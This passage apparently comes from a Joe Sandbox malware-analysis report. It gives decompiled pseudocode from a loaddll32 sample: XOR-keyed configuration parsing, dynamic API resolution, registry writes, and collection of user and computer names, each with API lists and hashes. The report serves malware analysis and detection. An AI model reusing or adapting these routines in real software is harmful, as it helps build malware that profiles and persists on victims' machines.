                                          					E00C7147E(_t28);
                                          				}
                                          				return _t36;
                                          			}















                                          APIs
                                            • Part of subcall function 00C76027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,00C74D46,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?), ref: 00C7608E
                                            • Part of subcall function 00C76027: sprintf.NTDLL ref: 00C760AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?,031395B0), ref: 00C74D57
                                          • lstrlen.KERNEL32(?,?,?,00C752FE,?,031395B0), ref: 00C74D5F
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • strcpy.NTDLL ref: 00C74D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 00C74D81
                                            • Part of subcall function 00C76F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00C74D90,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C76F4A
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C74D9E
                                            • Part of subcall function 00C74759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00C74DAA,00000000,?,?,00C752FE,?,031395B0), ref: 00C74763
                                            • Part of subcall function 00C74759: _snprintf.NTDLL ref: 00C747C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: f916a663e21137f3dfb4151af87e15af0633df782274d855938b1d33f836c213
                                          • Instruction ID: 8bc80ee78a5e5a788e36d547b76db45f5e4d2c07f55cc5bf78de131649953d90
                                          • Opcode Fuzzy Hash: f916a663e21137f3dfb4151af87e15af0633df782274d855938b1d33f836c213
                                          • Instruction Fuzzy Hash: AF11C673A015296B472277F89C85D6F3AAD9F457603058119F91CBB112CF74DD01A7E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00C798F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0xc7d2a0; // 0x59935a40
                                          				if(E00C796D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0xc7d2d0 = _v12;
                                          				}
                                          				_t23 =  *0xc7d2a0; // 0x59935a40
                                          				if(E00C796D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0xc7d2a0; // 0x59935a40
                                          						_t29 = E00C710CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0xc7d240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0xc7d2a0; // 0x59935a40
                                          						_t30 = E00C710CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0xc7d244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0xc7d2a0; // 0x59935a40
                                          						_t31 = E00C710CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0xc7d248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0xc7d2a0; // 0x59935a40
                                          						_t32 = E00C710CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0xc7d004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0xc7d2a0; // 0x59935a40
                                          						_t33 = E00C710CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0xc7d02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0xc7d2a0; // 0x59935a40
                                          						_t34 = E00C710CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E00C7A2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E00C79B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0xc7d2a0; // 0x59935a40
                                          						_t35 = E00C710CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E00C7A2EF(0, _t35) != 0) {
                                          						_t86 =  *0xc7d324; // 0x31395b0
                                          						E00C74C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0xc7d238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}






























                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C7997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C799AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C799DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C79A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C79A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00C74A8B), ref: 00C79AC3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 07d03052a59555eb6cbc0c9d05f124f81597dd43dacda13f8906a712f070c175
                                          • Instruction ID: 6adb4d81749d9e3b996b0f44668c94cfe7ab98a8ade936f92bcc2aa1e2cb51cd
                                          • Opcode Fuzzy Hash: 07d03052a59555eb6cbc0c9d05f124f81597dd43dacda13f8906a712f070c175
                                          • Instruction Fuzzy Hash: 4151A571B00104EED710EBB9DD89E5F76FDEB88710B688959B90EE7105EA31DE81E720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 00C713B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 00C713C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 00C713DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C71443
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C71452
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C7145D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 6f732946ce78e8d399304e7cf1cdad5eaa5ecf40bfd74b26c44e4f14d9f71e17
                                          • Instruction ID: fd8fda4386df6cfb019f7eb0501f5ac0cf2eee58ae7db57c0031278f8da38db6
                                          • Opcode Fuzzy Hash: 6f732946ce78e8d399304e7cf1cdad5eaa5ecf40bfd74b26c44e4f14d9f71e17
                                          • Instruction Fuzzy Hash: A2414036900609AFDB01EFFCD845A9EB7BAEF49301F148465ED18EB120DA71DE45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C757D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E00C758BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t1 = _t23 + 0xc7e11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t2 = _t26 + 0xc7e769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E00C7147E(_t54);
                                          					} else {
                                          						_t30 =  *0xc7d2a4; // 0x24ba5a8
                                          						_t5 = _t30 + 0xc7e756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0xc7d2a4; // 0x24ba5a8
                                          							_t7 = _t33 + 0xc7e40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0xc7d2a4; // 0x24ba5a8
                                          								_t9 = _t36 + 0xc7e4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0xc7d2a4; // 0x24ba5a8
                                          									_t11 = _t39 + 0xc7e779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E00C77B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}



















                                          APIs
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C714AF,?,?,?,?,00000000,00000000), ref: 00C757FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C7581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C75835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C7584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C75861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C75877
                                            • Part of subcall function 00C77B01: memset.NTDLL ref: 00C77B80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 889a55692c30e6a5fbf810dded571e43fa39016582ea8185c069737b07e18e0f
                                          • Instruction ID: 38ff7093edb52a782fdfd9401c462c00e1435ef1f57a885a394f8a923d4e0bc6
                                          • Opcode Fuzzy Hash: 889a55692c30e6a5fbf810dded571e43fa39016582ea8185c069737b07e18e0f
                                          • Instruction Fuzzy Hash: BF212AB1A0070A9FDB10DF69C844E6AB7ECEF44300B0581A5E90DDB251EA70EE458B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E00C7A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0xc7d33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E00C7A5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E00C7621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E00C7147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t16 = _t65 + 0xc7e8de; // 0x65696c43
                                          					_t68 = E00C7A5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d00c7c0
                                          						if(E00C74C9A( *_t33, _t96, _a8,  *0xc7d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0xc7d2a4; // 0x24ba5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0xc7ea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0xc7ea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E00C730FC( &_a24, _t73,  *0xc7d334,  *0xc7d338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0xc7d2a4; // 0x24ba5a8
                                          									_t44 = _t75 + 0xc7e856; // 0x74666f53
                                          									_t78 = E00C7A5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d00c7c0
                                          										E00C71BC1( *_t47, _t96, _a8,  *0xc7d338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d00c7c0
                                          										E00C71BC1( *_t49, _t96, _t103,  *0xc7d330, _a16);
                                          										E00C7147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d00c7c0
                                          									E00C71BC1( *_t40, _t96, _a8,  *0xc7d338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d00c7c0
                                          									E00C71BC1( *_t43, _t96, _a8,  *0xc7d330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E00C7147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d00c7c0
                                          					if(E00C774B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d00c7c0
                                          							E00C74C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E00C7147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E00C7147E(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0xc7d33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}
























                                          APIs
                                          • StrChrA.SHLWAPI(00C7553C,0000005F,00000000,00000000,00000104), ref: 00C7A675
                                          • memcpy.NTDLL(?,00C7553C,?), ref: 00C7A68E
                                          • lstrcpy.KERNEL32(?), ref: 00C7A6A4
                                            • Part of subcall function 00C7A5E9: lstrlen.KERNEL32(?,00000000,00C7D330,00000001,00C7937A,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?), ref: 00C7A5F2
                                            • Part of subcall function 00C7A5E9: mbstowcs.NTDLL ref: 00C7A619
                                            • Part of subcall function 00C7A5E9: memset.NTDLL ref: 00C7A62B
                                            • Part of subcall function 00C71BC1: lstrlenW.KERNEL32(00C7553C,?,?,00C7A818,3D00C7C0,80000002,00C7553C,00C79642,74666F53,4D4C4B48,00C79642,?,3D00C7C0,80000002,00C7553C,?), ref: 00C71BE1
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 00C7A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 95088a9f1d64677ae3118aca31dde7affe581849f1d517c3a911e7fc1718d900
                                          • Instruction ID: f89e3333f79e94f586e23486195ea00ff416f41f5361caa0cf99c195088a519f
                                          • Opcode Fuzzy Hash: 95088a9f1d64677ae3118aca31dde7affe581849f1d517c3a911e7fc1718d900
                                          • Instruction Fuzzy Hash: 84516B7250020AEFDF11AFA4DD41E9E7BB9EF44300F00C555FA2D96061E731DE55AB12
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C7614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E00C758BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E00C7147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0xc75210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}
















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,00C7520E), ref: 00C7615E
                                          • GetComputerNameW.KERNEL32(00000000,00C7520E), ref: 00C7617A
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetUserNameW.ADVAPI32(00000000,00C7520E), ref: 00C761B4
                                          • GetComputerNameW.KERNEL32(00C7520E,?), ref: 00C761D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00C7520E,00000000,00C75210,00000000,00000000,?,?,00C7520E), ref: 00C761FA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: f75df27ffcfde94883cf52bd05216f77291214944e84f7851ab4f3265c827191
                                          • Instruction ID: 054e70f9f40c4050216c1a9fdae9d75900afb723f811a3d28cf3275669c1ba69
                                          • Opcode Fuzzy Hash: f75df27ffcfde94883cf52bd05216f77291214944e84f7851ab4f3265c827191
                                          • Instruction Fuzzy Hash: 2F21F7B6900208FFCB11DFE8C985DEEBBB8EF44344B1484AAE506E7201E6309F44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00C762CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0xc7d114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0xc7d238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

















                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00C76301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C7632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00C76341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00C76350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00C7636B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 39c83d4217d8d569f12b321d411c7f2caba04a8185ddc319b8489a740e8c1522
                                          • Instruction ID: 523794aea427e65323c89de794fb988fe88576205d6b61862074005c087b5c39
                                          • Opcode Fuzzy Hash: 39c83d4217d8d569f12b321d411c7f2caba04a8185ddc319b8489a740e8c1522
                                          • Instruction Fuzzy Hash: 2E217C7690020AAFCB019F69C885BDEBF79EF85304F058058F958AB315C731EA55CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00C79FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
